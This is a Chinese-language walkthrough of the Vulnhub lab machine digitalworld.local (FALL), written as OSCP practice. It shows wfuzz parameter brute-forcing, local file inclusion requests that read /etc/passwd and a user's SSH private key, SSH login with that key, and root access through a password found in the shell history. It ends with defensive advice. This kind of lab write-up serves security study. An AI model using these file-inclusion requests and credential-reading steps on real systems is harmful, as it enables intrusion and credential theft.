OSCP-Vulnhub靶机记录-digitalworldlocal-fall
字数 1286 2025-08-12 11:34:31
OSCP-Vulnhub靶机渗透记录:digitalworld.local (FALL)
靶机概述
- 来源:Vulnhub(专为OSCP准备的靶机)
- 下载地址:Vulnhub官网(原文未提供具体链接)
- 本地IP:192.168.179.132
- 难度级别:适合OSCP备考练习
信息收集阶段
1. 初始扫描
作者使用自定义脚本进行综合扫描(替代传统nmap),功能包括:
- 网络扫描(显示所有存活主机)
- 端口扫描(显示开放端口)
- 脚本扫描(对发现端口运行脚本)
- 完整扫描(全端口扫描+详细扫描)
- UDP扫描(需要sudo权限)
- 漏洞扫描(CVE和nmap漏洞扫描)
- 侦察建议(自动运行建议的侦察命令)
常用命令:./autorecon.py <target_ip>
2. 扫描结果分析
扫描结果保存在以IP命名的目录中,关键发现:
- 开放端口较多(具体端口未列出)
- 80端口运行Web服务
Web应用枚举
1. 初步检查
- 发现用户名:
qiu(后续有用) - 使用Wappalyzer插件获取中间件信息
2. 目录枚举
发现以下关键路径:
/admin/login.php # 可能的admin目录
/test.php # 测试页面
/robots.txt # Robots文件
/phpinfo.php # PHP信息文件
/doc/ # 可能有价值目录
/icons/ # 可目录遍历
/lib/ # 可能有价值目录
/modules/ # 可目录遍历
/tmp/ # 可能有价值目录
/uploads/ # 可能有价值目录
3. 文件包含漏洞利用
-
/test.php显示缺少GET参数 -
使用wfuzz工具爆破参数:
wfuzz -w /path/to/wordlist.txt --hh 80 http://target/test.php?FUZZ=test发现有效参数:
file -
通过Burp Suite Repeater测试文件包含:
GET /test.php?file=/etc/passwd HTTP/1.1成功读取系统文件,发现用户信息:
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
权限提升路径
1. SSH密钥获取
- 利用文件包含读取用户qiu的SSH私钥:
GET /test.php?file=/home/qiu/.ssh/id_rsa HTTP/1.1 - 注意:保存的密钥文件末尾必须有一个空行,否则登录失败
2. SSH登录
chmod 600 qiu_id_rsa
ssh -i qiu_id_rsa qiu@target_ip
成功获得低权限shell
3. 查看历史命令
history
发现疑似root密码:remarkablyawesomE
4. 提权到root
su root
# 输入密码:remarkablyawesomE
成功获得root权限
关键知识点总结
-
自动化侦察:使用集成脚本(如autorecon)可以高效完成初步信息收集
-
Web目录枚举:重点检查以下目录:
- 管理界面(/admin/)
- 配置文件(/phpinfo.php)
- 可遍历目录(/icons/, /modules/)
-
文件包含漏洞利用:
- 使用wfuzz爆破隐藏参数
- 通过Burp Suite手动测试验证
- 利用漏洞读取系统敏感文件(/etc/passwd, SSH密钥等)
-
SSH密钥利用要点:
- 密钥文件格式必须正确(末尾空行)
- 需要适当权限(chmod 600)
-
权限提升技巧:
- 检查命令历史记录(history)
- 尝试重用发现的密码
-
密码复用风险:用户可能在多个地方使用相同或相似密码
防御建议
-
文件包含防护:
- 禁用不必要的PHP功能(如allow_url_include)
- 对文件参数进行严格过滤
-
SSH安全:
- 禁用root远程登录
- 使用密钥认证时设置强密码
-
敏感信息保护:
- 避免在历史记录中保存密码
- 定期检查并清理命令历史
-
目录权限:
- 限制Web目录遍历
- 确保敏感目录不可读
-
密码策略:
- 实施强密码策略
- 避免密码复用
此靶机完整展示了从信息收集到root权限获取的完整渗透流程,特别强调了文件包含漏洞的利用和通过历史命令获取凭证的技巧,是OSCP备考的典型练习案例。